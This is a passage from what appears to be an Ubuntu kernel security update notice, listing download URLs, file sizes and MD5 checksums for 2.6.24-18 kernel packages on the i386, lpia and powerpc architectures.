2fc3152f9f4d8605ddf5442d4824a808 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-18-386_2.6.24-18.32_i386.deb Size/MD5: 25424528 9612b2792dcfe98909cf2d2722ccd91d http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-18-generic_2.6.24-18.32_i386.deb Size/MD5: 26225942 36c17765cf0340cb82943801f3a871f0 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-18-server_2.6.24-18.32_i386.deb Size/MD5: 27245274 defba393fd5e676b87f4782fb809af88 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-18-virtual_2.6.24-18.32_i386.deb Size/MD5: 24755394 35b5f4e22d35d386d7ee9ef272be1e55 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-18.32_i386.deb Size/MD5: 694064 87fada641c1abd5eb60001dcd947785b http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb Size/MD5: 258876 2ee2a746fed87cdd7f0f12525786517d http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb Size/MD5: 264132 8aaa2991a4679fa58b133a6f92cdcb0c http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb Size/MD5: 163140 051752b4ceb7a7e2b0b64eaa2da051a3 http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb Size/MD5: 162954 0f9609047bb9c745bbd4a1b317679c2f http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb Size/MD5: 236694 93ba9f9ad1d0292ea89f91fb4e66c81b http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb Size/MD5: 244950 87b1bd04e5fa2c7cb3ea4c2f092919e6 http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb Size/MD5: 1806350 e5ffc2449dc31bdd76a27252e559e4d1 http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb Size/MD5: 1823616 dd9900c809284e49ce4a70bae8748117 http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb Size/MD5: 150754 2dd341be4e5c0ea4116e7430b024d42b http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb Size/MD5: 142954 b1083d31b1beac3c998ed42b0f2e4d12 http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb Size/MD5: 155934 ba940c4d3a57b8527ad7031e0c6c9ea0 http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb Size/MD5: 156966 4dddb78c20b3105e60c1e2f7a8260075 http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb Size/MD5: 107158 236d01ea748338996f7e031b8faba624 http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb Size/MD5: 108474 7e4858e4e0ee3b8d5eea48bb5078ac2b http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb Size/MD5: 32966 31271883729abd220ff27aa0427bbf71 http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb Size/MD5: 33390 5065d12c6916bac7ffa86e4a20fa17e0 http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb Size/MD5: 60736 be4644d90091d46eae1bfec641a34d70 http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb Size/MD5: 61150 5ca12b84f60c5cd9f8c3f54ab46e9cce http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb Size/MD5: 82636 7b9210f1320c834fb1cc90308a68bb1a http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb Size/MD5: 82962 d53cbbeefbc7267138cec9b2b70ce366 http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb Size/MD5: 48354 491c1aa7d9fb970c43d00283243bcc88 http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb Size/MD5: 48252 7ce6903dcb8ac65e2c8858e78b6ca47d http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb Size/MD5: 8154 8e4d6723ac918f954b7bb4c19f525f93 http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb Size/MD5: 8400 0c521c708f9d72262bbc90366450d0af http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb Size/MD5: 51038 b068a84d6a845fe67bce76b02d74fb84 http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb Size/MD5: 52888 9e8ca49a09af13752062f28096157d6d http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb Size/MD5: 92108 34cd2a96a41a256f9d90bddba34eed79 http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb Size/MD5: 92372 471e0e2a2a266abac09442c0237ff903 http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb Size/MD5: 1443026 aa80832281adce3452795c1e608536e6 http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb Size/MD5: 1426444 5fc2a93319fd230d07f8d1c710d79669 http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb Size/MD5: 43224 9d0c2fb95fc7c68e2580d850b17ddd87 http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb Size/MD5: 42800 49ceefb6916ba3607971af2ab8d8e6cc http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb Size/MD5: 11412 cfd2e3a44738ad6f8e22037f4fec2d48 http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb Size/MD5: 12016 ae32775976a1f98ad1255f5ce0e2a9ea http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb Size/MD5: 469988 fd0cbf505b20fe1faafaae256a2038bf http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb Size/MD5: 471966 77e5c8bcb09fc6656f2e4178a1993334 http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-18-386-di_2.6.24-18.32_i386.udeb Size/MD5: 69680 b22d6e794b87554bebd1aa6bfbe44ac7 http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-18-generic-di_2.6.24-18.32_i386.udeb Size/MD5: 70490 42827302a25390eafbf3b90e51017920 http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.24/fglrx-kernel-source_8-3+2.6.24.13-18.41_i386.deb Size/MD5: 169722 01ea49055304653e56059ee3f04feb9c http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.24/linux-restricted-modules-2.6.24-18-openvz_2.6.24.13-18.41_i386.deb Size/MD5: 20257548 1f6f707a372b90a409f17a3c567b0a38 http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.24/linux-restricted-modules-2.6.24-18-rt_2.6.24.13-18.41_i386.deb Size/MD5: 18683582 257cadecb666f510c592d1cf1e1a5f0d http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.24/linux-restricted-modules-2.6.24-18-xen_2.6.24.13-18.41_i386.deb Size/MD5: 11504814 12cfa0f487ae3734ac6cc34525945b15 http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.24/nvidia-glx-legacy-dev_71.86.04+2.6.24.13-18.41_i386.deb Size/MD5: 154164 5ab0e61832d95eca47b737a3dec891a6 http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.24/nvidia-glx-legacy_71.86.04+2.6.24.13-18.41_i386.deb Size/MD5: 3075606 a5534fcf2dca85b6071ac7ca23fe0a74 http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.24/nvidia-kernel-source_96.43.05+2.6.24.13-18.41_i386.deb Size/MD5: 1770550 caf876176fa7ea999fa364d7861475b1 http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.24/nvidia-legacy-kernel-source_71.86.04+2.6.24.13-18.41_i386.deb Size/MD5: 1385994 e0fb1bb484eec57d40d41c4646efce33 http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/avm-fritz-firmware-2.6.24-18_3.11+2.6.24.13-18.41_i386.deb Size/MD5: 1214390 b3128dfe27d830117f91da7dc067175a http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/avm-fritz-kernel-source_3.11+2.6.24.13-18.41_i386.deb Size/MD5: 4091542 11c2f9db165625781f617dc6a70256c1 http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/fglrx-amdcccle_2.6.24.13-18.41_i386.deb Size/MD5: 38070 a41f984b711e0b0b409f66834ea6dea5 http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/fglrx-control_8-3+2.6.24.13-18.41_i386.deb Size/MD5: 5408610 c85e01952b978bec7683ab4f8be71aef http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/linux-restricted-modules-2.6.24-18-386_2.6.24.13-18.41_i386.deb Size/MD5: 18673882 437d815f5ffadb92b291a940791c6b36 http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/linux-restricted-modules-2.6.24-18-generic_2.6.24.13-18.41_i386.deb Size/MD5: 18525788 98008d2cf59f811798fcc97c5e2f3d50 http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/linux-restricted-modules-2.6.24-18-server_2.6.24.13-18.41_i386.deb Size/MD5: 18560550 e360e74561f10786a88ae463e5295a2d http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/nic-restricted-firmware-2.6.24-18-386-di_2.6.24.13-18.41_i386.udeb Size/MD5: 760 a9e60fcccfa8b1d3f064b3c404167cfc http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/nic-restricted-firmware-2.6.24-18-generic-di_2.6.24.13-18.41_i386.udeb Size/MD5: 764 3421735eff94623ef0cf8fa1951cabdf http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/nic-restricted-modules-2.6.24-18-386-di_2.6.24.13-18.41_i386.udeb Size/MD5: 730 a5a3e0f2a9455191eb236f0ff95f013a http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/nic-restricted-modules-2.6.24-18-generic-di_2.6.24.13-18.41_i386.udeb Size/MD5: 732 96f8008fd50db0f9eb6e9203d5e86394 http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/nvidia-glx-dev_96.43.05+2.6.24.13-18.41_i386.deb Size/MD5: 164344 b95880b645d19f944bc48b95d9c53337 http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/nvidia-glx-new-dev_169.12+2.6.24.13-18.41_i386.deb Size/MD5: 155090 923bd182221ba1fc0428201a8a993897 http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/nvidia-glx-new_169.12+2.6.24.13-18.41_i386.deb Size/MD5: 5249274 a53951cab64969d1330ed4b70acd6374 http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/nvidia-glx_96.43.05+2.6.24.13-18.41_i386.deb Size/MD5: 3853176 120cbf7cc858ec62e863c9f4bf0385bc http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/nvidia-new-kernel-source_169.12+2.6.24.13-18.41_i386.deb Size/MD5: 2801142 cf19d871701739a0fd1715e0308afb4a http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/xorg-driver-fglrx-dev_7.1.0-8-3+2.6.24.13-18.41_i386.deb Size/MD5: 72646 3c59e75801efd32f14db8cbea4ea208f http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.24/xorg-driver-fglrx_7.1.0-8-3+2.6.24.13-18.41_i386.deb Size/MD5: 9951338 70b18f5182efe13b14ccb640e4bd6788 http://security.ubuntu.com/ubuntu/pool/universe/l/linux-backports-modules-2.6.24/linux-backports-modules-2.6.24-18-openvz_2.6.24-18.16_i386.deb Size/MD5: 423570 3e573c9920c76f9b1f2e86b0b1fa7b32 http://security.ubuntu.com/ubuntu/pool/universe/l/linux-backports-modules-2.6.24/linux-backports-modules-2.6.24-18-rt_2.6.24-18.16_i386.deb Size/MD5: 426800 bff4707b888ce7d310d2fbed521a522c http://security.ubuntu.com/ubuntu/pool/universe/l/linux-backports-modules-2.6.24/linux-backports-modules-2.6.24-18-xen_2.6.24-18.16_i386.deb Size/MD5: 424156 8e9b0e4e886b6acd538184275842c416 http://security.ubuntu.com/ubuntu/pool/universe/l/linux-backports-modules-2.6.24/linux-headers-lbm-2.6.24-18-openvz_2.6.24-18.16_i386.deb Size/MD5: 2880 a1ca95e2bda8b77e689e22252ac25f51 http://security.ubuntu.com/ubuntu/pool/universe/l/linux-backports-modules-2.6.24/linux-headers-lbm-2.6.24-18-rt_2.6.24-18.16_i386.deb Size/MD5: 2872 e8376364fbd8d996dc1f9525a1c3e020 http://security.ubuntu.com/ubuntu/pool/universe/l/linux-backports-modules-2.6.24/linux-headers-lbm-2.6.24-18-xen_2.6.24-18.16_i386.deb Size/MD5: 2874 8b44b4e1b88423d30ecdb856f88b81bc http://security.ubuntu.com/ubuntu/pool/universe/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-18-openvz_2.6.24-18.26_i386.deb Size/MD5: 184538 1aaaffea240c1c24f04cb148d3ec0676 http://security.ubuntu.com/ubuntu/pool/universe/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-18-rt_2.6.24-18.26_i386.deb Size/MD5: 184532 efaa0d6f8f1e1ab3ea9b55e3d288a8bd http://security.ubuntu.com/ubuntu/pool/universe/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-18-xen_2.6.24-18.26_i386.deb Size/MD5: 184366 4cb687f3762c2a94da95f5863bb92f3e http://security.ubuntu.com/ubuntu/pool/universe/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-18-openvz_2.6.24-18.26_i386.deb Size/MD5: 4421962 763cfcf84a80ffbc83d22d9357899dea http://security.ubuntu.com/ubuntu/pool/universe/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-18-rt_2.6.24-18.26_i386.deb Size/MD5: 4299836 13e61724492173d2c83fead2f59bd75d http://security.ubuntu.com/ubuntu/pool/universe/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-18-xen_2.6.24-18.26_i386.deb Size/MD5: 2929980 f91f29ff81733677ecd2f41de30c2477 http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-18-openvz_2.6.24-18.32_i386.deb Size/MD5: 20224058 2a8c5a27343b744df5ff26d0d9da2fc1 http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-18-rt_2.6.24-18.32_i386.deb Size/MD5: 18414832 80f60e6a11437fc72298620e4d7ef585 http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-18-xen_2.6.24-18.32_i386.deb Size/MD5: 18736684 b90c37c367a75b6c60b4ad23aa697b25 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/l/linux-backports-modules-2.6.24/linux-backports-modules-2.6.24-18-lpia_2.6.24-18.16_lpia.deb Size/MD5: 424312 0694d3e437455dea441b521da4273217 http://ports.ubuntu.com/pool/main/l/linux-backports-modules-2.6.24/linux-headers-lbm-2.6.24-18-lpia_2.6.24-18.16_lpia.deb Size/MD5: 2866 7be8f6291f505c828e407c57ed8fb69e http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-18-lpia_2.6.24-18.26_lpia.deb Size/MD5: 184374 c32979289a4cbdec2426afff36bc6111 http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-18-lpia_2.6.24-18.26_lpia.deb Size/MD5: 2925652 4c84ea115b04e03338a550fe24586039 http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-18-lpia_2.6.24-18.32_lpia.deb Size/MD5: 673934 9cba89732fe58bdb8853275f39030180 http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-18-lpiacompat_2.6.24-18.32_lpia.deb Size/MD5: 692864 876c8d72db2877231f7765b555fca5f1 http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-18-lpia_2.6.24-18.32_lpia.deb Size/MD5: 15043850 461f06eb778dd9f2ba264b1205021c7f http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-18.32_lpia.deb Size/MD5: 694048 5b7d49d3df03fda3d105006add9b4d04 http://ports.ubuntu.com/pool/multiverse/l/linux-restricted-modules-2.6.24/linux-restricted-modules-2.6.24-18-lpiacompat_2.6.24.13-18.41_lpia.deb Size/MD5: 3973708 62c228976a0fcea9d5e526e4c96a507e http://ports.ubuntu.com/pool/restricted/l/linux-restricted-modules-2.6.24/linux-restricted-modules-2.6.24-18-lpia_2.6.24.13-18.41_lpia.deb Size/MD5: 3955244 a196af7d67dfa278e65687a3d780b424 http://ports.ubuntu.com/pool/universe/l/linux-backports-modules-2.6.24/linux-backports-modules-2.6.24-18-lpiacompat_2.6.24-18.16_lpia.deb Size/MD5: 423968 c66806b0040811b27074a386561ca7ac http://ports.ubuntu.com/pool/universe/l/linux-backports-modules-2.6.24/linux-headers-lbm-2.6.24-18-lpiacompat_2.6.24-18.16_lpia.deb Size/MD5: 2880 236c98afbbebcc9ac7f0107829504624 http://ports.ubuntu.com/pool/universe/l/linux-backports-modules-2.6.24/updates-modules-2.6.24-18-lpia-di_2.6.24-18.16_lpia.udeb Size/MD5: 642 0d2d8c5e9c9926fa641abb13683ab0ea http://ports.ubuntu.com/pool/universe/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-18-lpiacompat_2.6.24-18.26_lpia.deb Size/MD5: 184376 af72bbeb4cc78981273d5e21f9bbbb55 http://ports.ubuntu.com/pool/universe/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-18-lpiacompat_2.6.24-18.26_lpia.deb Size/MD5: 2769216 437e11d53e7cb848a24812f12f35593e http://ports.ubuntu.com/pool/universe/l/linux/linux-image-2.6.24-18-lpiacompat_2.6.24-18.32_lpia.deb Size/MD5: 19784744 b72dc9eedfe3fff79dee85eefd206a01 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/l/linux-backports-modules-2.6.24/linux-backports-modules-2.6.24-18-powerpc-smp_2.6.24-18.16_powerpc.deb Size/MD5: 445146 57cdb48eea17611a2fa9a1be3bdd9857 http://ports.ubuntu.com/pool/main/l/linux-backports-modules-2.6.24/linux-backports-modules-2.6.24-18-powerpc64-smp_2.6.24-18.16_powerpc.deb Size/MD5: 512398 70ce4a3a85429d0ec56337a4f63e7ddf http://ports.ubuntu.com/pool/main/l/linux-backports-modules-2.6.24/linux-backports-modules-2.6.24-18-powerpc_2.6.24-18.16_powerpc.deb Size/MD5: 441610 5718e6c12e1a42a2cf4c1108d7d2de68 http://ports.ubuntu.com/pool/main/l/linux-backports-modules-2.6.24/linux-headers-lbm-2.6.24-18-powerpc-smp_2.6.24-18.16_powerpc.deb Size/MD5: 2882 040034a1d9c2fd2a972e040e6b2a99a1 http://ports.ubuntu.com/pool/main/l/linux-backports-modules-2.6.24/linux-headers-lbm-2.6.24-18-powerpc64-smp_2.6.24-18.16_powerpc.deb Size/MD5: 2888 40799dba4407a3df423a71f78cac7126 http://ports.ubuntu.com/pool/main/l/linux-backports-modules-2.6.24/linux-headers-lbm-2.6.24-18-powerpc_2.6.24-18.16_powerpc.deb Size/MD5: 2882 f11e6588f1d951bb11b14ba32483fc96 http://ports.ubuntu.com/pool/main/l/linux-backports-modules-2.6.24/updates-modules-2.6.24-18-powerpc-di_2.6.24-18.16_powerpc.udeb Size/MD5: 640 817e4430cdb2476b968d826cecdf3ac7 http://ports.ubuntu.com/pool/main/l/linux-backports-modules-2.6.24/updates-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.16_powerpc.udeb Size/MD5: 650 8712e5ea93e1daf48e59de7202ef193d http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-18-powerpc-smp_2.6.24-18.26_powerpc.deb Size/MD5: 184402 fecbc5ffa9320b4c1bf0a61405069a6f http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-18-powerpc64-smp_2.6.24-18.26_powerpc.deb Size/MD5: 184410 efb5cdc5f39cf53d29a4da26a4a6c038 http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/linux-headers-lum-2.6.24-18-powerpc_2.6.24-18.26_powerpc.deb Size/MD5: 184378 34a628354e54b679999d8ca73bd5bc6e http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-18-powerpc-smp_2.6.24-18.26_powerpc.deb Size/MD5: 2625426 25186a51be18660bb7fac962ed244356 http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-18-powerpc64-smp_2.6.24-18.26_powerpc.deb Size/MD5: 2586934 82f65d2e388dc95e2c5f37a39d632d29 http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/linux-ubuntu-modules-2.6.24-18-powerpc_2.6.24-18.26_powerpc.deb Size/MD5: 2611998 fee1780aa636d4a5e604d547c37c33f7 http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/nic-firmware-2.6.24-18-powerpc-di_2.6.24-18.26_powerpc.udeb Size/MD5: 1048394 205948af3844d8caa93ace1e720b292c http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/nic-firmware-2.6.24-18-powerpc64-smp-di_2.6.24-18.26_powerpc.udeb Size/MD5: 1048568 c82d1031236d0d280a46c142718051f3 http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/scsi-firmware-2.6.24-18-powerpc-di_2.6.24-18.26_powerpc.udeb Size/MD5: 322514 51f93163a08389aa917eb8efa3bf3fcc http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/scsi-firmware-2.6.24-18-powerpc64-smp-di_2.6.24-18.26_powerpc.udeb Size/MD5: 322552 511e3c63d1ef5ae10f5567286389dbbd http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/ubuntu-modules-2.6.24-18-powerpc-di_2.6.24-18.26_powerpc.udeb Size/MD5: 329480 7cbad7a4521672d3dfe198c2c61ef248 http://ports.ubuntu.com/pool/main/l/linux-ubuntu-modules-2.6.24/ubuntu-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.26_powerpc.udeb Size/MD5: 391708 d3bb8672804ab41f670065b04194ab0a http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb Size/MD5: 334070 40ed39fb64a25818071e89d4a9d22c0a http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb Size/MD5: 318840 a0c474e4d8612349d00e14925906573a http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb Size/MD5: 62716 f9d46e0e9ac36438e60739344e516b5f http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb Size/MD5: 73012 5858fd81693e84cc238ffca0edd002dd http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb Size/MD5: 41450 a94708d50025f51d76b254d5241d6c8f http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb Size/MD5: 47836 1032c53d070e59c110e297b8381450a2 http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb Size/MD5: 89460 6bd80ddeab93bfc5e23d412d6afe1c7c http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb Size/MD5: 105688 ba69b18b4a010424e6e342edc780ff73 http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb Size/MD5: 44818 a0e6d21d80fed601e4d87d759f78168b http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb Size/MD5: 40934 9094ce341b0ee32210b9987074031b01 http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb Size/MD5: 704274 1204da651e67211bfaaae60c615a4ec3 http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb Size/MD5: 770558 a1d311eedb5931c201489d413b00b28f http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb Size/MD5: 242758 d5c4071ffec95ca25a2dccbb9c9bc7da http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb Size/MD5: 245784 8300bbb39bebe3937cd99d6225acf07b http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb Size/MD5: 69122 8379d5159fffc884fff4f6d7838c7066 http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb Size/MD5: 132586 a6566a3e9f3856afd8451d24f2d6799b http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb Size/MD5: 70020 a5c82e3f4288ede9d1641688e5f1c727 http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb Size/MD5: 77202 afe28dc2b2d5078d77fa16030b7258d8 http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb Size/MD5: 146052 16467bf12370bcc658f2d30aac186595 http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb Size/MD5: 164982 e9cbeb87e97d68f2824637c6ca86ae60 http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb Size/MD5: 387122 0edbd54746145babc0d313027a5de80e http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb Size/MD5: 350034 dde3eac1493fac7aae2cd505e37cf231 http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-18-powerpc-di_2.6.24-18.32_powerpc.udeb Size/MD5: 2427758 be0c70e87fc17b3f1caac01ebdf245e1 http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-18-powerpc64-smp-di_2.6.24-18.32_powerpc.udeb Size/MD5: 3467216 